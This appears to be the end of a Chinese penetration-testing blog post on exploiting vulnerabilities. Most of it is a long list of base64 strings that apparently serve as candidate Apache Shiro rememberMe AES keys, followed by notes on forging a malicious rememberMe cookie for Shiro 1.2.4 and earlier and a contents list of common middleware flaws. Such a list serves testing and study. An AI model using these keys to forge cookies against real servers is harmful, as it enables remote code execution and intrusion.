otifL/3x7EznbJPnyZ+ECQ==
ouaD8k/vPrj3ciMATK+2/w==
oy8ELUj/VgzlCNdWf3h//Q==
p3dp8ojPX4R0GRMVeSAd4Q==
p5BESMRL9wyZ1oj7B6geHg==
p6bIYZCynq7cXFFrdGAl1Q==
p7NcX6q0slluQCAWEGdwVQ==
pKLt7P9oogEfSc77KEQoZQ==
pLed3YBRRIhitK3C8+PxHA==
pSj0ujKIu9rqWE6KiqkXwQ==
pSnUw0ykd+COIvsJGFq3rg==
paVp5kn5aOLQwNXf4XIBjQ==
pcJOpNekDJEtXIFb7TeU8g==
phDoODMycFSFCdBTTmDxNQ==
pnAyV1S2EggTG1uJqbGomw==
prx0GOkoatLNrtYIbfoPxQ==
psEX/kWfxE0INGre8QDHDw==
pvXSm7Eh4i0LqULmcFyUhw==
q4rYOgVnG2Qi+yYQZgprew==
qIhbwUpNl6YUe+gjPP/NEg==
qJnaEQtpTumShsoEBPTS/w==
qKfduuy+f7TW8BnOJuZeHw==
qMEzyGxs6PcHCe16m+DZKA==
qMQfy3WOiHLyYkzcXpNsLA==
qPr9FPiu5Vu+6soaD2W9Rw==
qTxK2Riqb0nIq02mZ30Y2A==
qUbzSwjhBfAWpOiOugYe5w==
qajDHDT91DFjQvf+vZR7Kw==
qvi4m0lRfl0Zizk5ip1r5A==
r20flUTNuoVqV3fnJsMUwg==
r89fpQXp13fmF4kzUfDuoA==
r8eg47skSEyfA2btmErRQQ==
rD03BQk2kdBkqqNNL+HWVA==
rDzITdJ0ayTaG3S1pulFxQ==
rE7cQLcfrjoHVUhU31kALw==
rEXZ5oHbZOKgs2MBJdTkEA==
rFLib6x+ktTecvkpxt6OFg==
rGbM1vT+zLmRqThyn/VIwQ==
rMe6KnHoN/7M1YE/EPRhhQ==
rOR/3TpLLCVwLC7l07r90Q==
rOvHadwM8KttfSOi/q1Pvw==
rQQKRPVmmpIQ8cljFPHIYQ==
rQc3dKkwP45hAb2pXHnM/A==
rVeaKPC//gvovFD1If4nHg==
rVnuqPTlXkEtQR0CsdxV9w==
rXLUcoImJP8RBgP8L64uGQ==
ra/xC+nrOTuI/vPdLYfpGQ==
ran5rq7YzA6hG7wQTZsP6Q==
rcuaIKtKMQbZh9O+LQ0y9A==
rdHI8JgsiklSqDiHj6FTPg==
rdOa2Brixuhnc+K2+lcNFw==
ri7bl4Q32mnFLX4HyqJyYQ==
rvovJeBXWeI4ohSPNnfzjw==
s/wTft5+uSaONMF3vnlZkw==
s2mFzuS3Cw985oS++umoGQ==
s9h9uiscldRNfCNy672Xfg==
sAcbMSdf2dz4hBtz+uKGsg==
sBCqEOwraWJEHpOJjWPU4w==
sBZ+y0i5UfLmLwf5EjXHlg==
sFTAHkio5ljbhBxWWiDh+Q==
sGhc4rkEcYumNA8WahqwJg==
sIfaz3uuv/KpmCp70W/gwQ==
sNr3NaS3o58cvxyL6tC5WA==
sZ6glnU252P46aeK1qEQog==
sdodasF2xI446mVp5UIM2A==
sfXaK7Slf0qPeQNEi7jK8Q==
siHt7SxnHhaI86OIrArMwA==
slnGASPnV2E1ZDCU8Yrd0Q==
srNnRz3w7RBWKCU/zjTmYw==
sy05dMAiiJtLfoCo29xjrg==
t41dczuACfHuZK1tckv/5Q==
t50cFSIgZ9c/86OCrZ8X7w==
tDxnIAIcal1pg0ajWxI56A==
tEOJKNEX+Q/FthUWNLwxOw==
tFHEWD1iAftKlAO+h7FrWA==
tQa31QsLrMT3gp3EjMu4Vw==
tTDwW0Tn4cQQcp8Qu23ZTQ==
tVWukoRTPhoMyRHJ0Verfw==
tW0NnDW8fP83y5Q5HMr6ew==
tXdQr43/fZpfP3LT0dWgIQ==
tfYteaCxNqGoDe5WGPKHBQ==
tiNQp1lwJCnEvU4CsZoDjw==
tpXDa3rd1T8Is3Esk6774A==
tuPBaCh7xvo/aaqL3dbw6g==
u6jFX/puCoaWgj605jG2Aw==
uA/LpLw5VGa5ZAOYlKqFYg==
uEqDzVoHwFd6bOmWF5mfkA==
uHDj/ApSuPah0ATdmFtneQ==
uQq7qzqMdTkReRclk/vg3w==
uXCDAhHvZ2Xi2JrMQPHz0w==
ueLnhDgNYs0l6CNY2ie0HA==
uiZDeD9f999GmetIA4wspw==
uizChCzf7D4gHr7cYhJysg==
uppV9kZeD8kihlYY+VAGCQ==
uvZe+X2+GyV/zzgVdNOUyw==
v4M2sMhcxz5zXpWst9LxDg==
v4nkwWOqi6gO4pTD1kwdXg==
v6J1Z6oJcUCCJeg/U7q4qA==
v9hbbr19KYfwYMODGS4fVQ==
vIFcqWLpL5sZN0NKuRRLcA==
vKjf7jtnLVzKlpiEBj6g6g==
vY2CPWf08YvTlxHZHxJB5g==
vYFLuRvchlgmo3fWMEAVOA==
vzKf4la46A+sdpblFEn60A==
w2vMYewyr+KXmNlv39XEEQ==
wH1KOSuiv7Kn6GeNVZ9+7w==
wMa+wwDpXgJwyjrqQGre5Q==
wRTQp0M40hcUq6p22x6DNQ==
wY5M5k/cJ5cd8Scms+Ivvw==
wgMkUJ0+IHKwc163fwW6WQ==
wpKnsDvV7zzReQSmY05Jfw==
wyY0puJrynwfuBoX/5SfXg==
x5RT17zr46N4v32uMGoT7Q==
x8OUddV52M1sD2iX1TgwPQ==
xY/Py8rrXpIaiP5DYHKHJQ==
xaOWanZ5FMwjZLcg3OkZpg==
xfHhfJa8H2fhxb70d4wPhg==
xliLxYKmWp7FdJDTvR64aw==
xvhzjL0Dz3zX0J5H6+G7mw==
xxOUGpTHB6ZL6FcjXxNmZg==
y+iKxEfLmoz/46fcMdne5g==
y+lrzDXb0bQi74d7a2YsoA==
y9N/A+XzRNmFhBSJMnwtew==
yWz42JvzwNDc/xifdSINLA==
yg8tW9kDLR7wzoSLvPwvwg==
ygJw7ry1XevpnCys1hOmZg==
ykFi595/Fl04fJ2xuBYwYw==
yl3gvDmII9F74JQSaPUuIA==
ypb2mLD/Y9ZF4LlsPGRJUw==
ys6irM6SToSvJtWOfere4Q==
yunQrhFO8OmTyUwFz/OCVA==
ywM+CNdZoaXVGX9ybf9btQ==
z4rUCB8E9U71fFOwh//GjA==
z9Pdt1YVDM+4O0qjVSMz1g==
zC8aC11AVNa1g3rHB5p8tg==
zFz5Hu1NTuGLNZfmmPRUuQ==
zGB+ygayX4v8GHrp/vYOyg==
zGTO3faB2+62LU9ZV81b8w==
zH+m8pQ49HUq3Ru7Oym9/w==
zKi5alGrBnK0lWU0rLZfrQ==
zWbMTzTmFtUVciUE3Yo2Xg==
zZG0cSIvFgY83wrVLVYj/w==
zcR8SLYBJFyOknQxqW46Hg==
zfDkwwF9ydiIbXTMxRaHGA==
znJ984VkEEKwW5ZbbCYd0Q==
zx9DvPzTSauVSdn2XDWIdg==
zy1KJFZ6eucDxK6nGW0xcQ==
lxuEtAWbv+SgUOXREM+zrA==
2AvVhdDFCVdfdfDFAdag==
Kyjwds5ZLEBUhA4a9O1DhQ==
4AvVhmFLUs0KTA3Kpr3sd3ag==
ikB3y6O9BpimrZLB3rca0w==
6GvVhmFLUs0KTA3Kprsdag==
6Df5w6FRPCVQV0dhhUrZZ
2AvHhdsgUs0F0A3SDFAPa==
7gzYfKjTASKdsai43ds==
LafjwUgsDlNmnet47IJQWg==
2AvHhdsgUs0F0A3SDFAPa*==
pMvTx48hLt+/C8D+cM5vR==
zzrsUhmFL9Ks0KTLUsvV4AAdzz==
dG91dGlhbzEyMzQ1Ng==
2AvVhdUs0FSA3SDFAdag==
AvVhmFLUs0KTA3Kprsdag==
WWFuemhlbmcg5Lil5q2jAA==
W2h5bXNdY29va2llQA==
dG91dGlhbzEyMzQ1NQ==
dWZkbXBhc3MxMjM0NTY3OA==
9Jo0hLz8XhDpPsOOYOnSUA==
bT3ovvD7RfGDc0BXO5ORyA==
1t43gns419h1g61dpnpfe
4AvVhmFLUsOKTA3Kprsdg==
UFz8ias3ZKYzku/ZUuG9yw==
P7sWnbtUYuVxgVFvFlHpvQ==
k3+XHEg6D8tb2mGm7VJ3nQ==
GhMXBsUK/105DRCJvsCt/A==
ZGdmdwAAAAAAAAAAAAAAAA==
6Df5w6FRPCVQV0dhhUrZ*Z
Us0KvVhTprsAm43KFLAdag==
bQY8T1A6hrHOfQrg0mv7Eg==
bSqtfpTeQHIOOKKjugqPjg==
blyGEQEhBYYVjrzAzP30GQ==
btQuG8vtGbZsLFZH88e//A==
2weDYcR3DPa6nf8Z42d2XQ==

payload产生的过程

命令 => 序列化 => AES加密 => base64编码 => RememberMe Cookie值

所以我们只要得到aes加密的密钥，就可以构造payload

任意http请求中 cookie 处rememberMe参数

特征判断

返回包中包含 rememberMe=deleteMe 字段，认证失败时会设置 deleteMe 的 cookie

Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0;

影响版本

Apache Shiro <= 1.2.4（需要获取AES秘钥）

利用组件

Apache Shiro <= 1.2.4（需要获取AES秘钥）

payload 构建

命令 => 序列化 => AES加密 => base64编码 => RememberMe Cookie 值

#渗透

漏洞攻击利用

https://tsy244.github.io/2023/08/26/渗透/漏洞攻击利用/

Author

August Rosenberg

Posted on

August 26, 2023

Licensed under

渗透测试框架 Previous

实验 Next

漏洞攻击利用

漏洞攻击利用

弱口令密码破解

常用的密码网站

弱密码破解方法

暴力破解的场景

爆破方法

未授权访问漏洞

常见的未授权的漏洞

redis未授权访问

常见中间件漏洞

weblogic

java 开发框架漏洞

JBOSS漏洞

JMX Console 未授权访问漏洞

Struts2漏洞

php开发框架漏洞

thinkphp

FastJson漏洞

Shiro漏洞